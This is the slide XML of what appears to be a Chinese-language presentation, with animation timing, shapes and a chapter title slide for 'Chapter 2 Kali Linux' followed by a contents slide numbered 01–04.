                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>
    </p:bldLst>
  </p:timing>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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
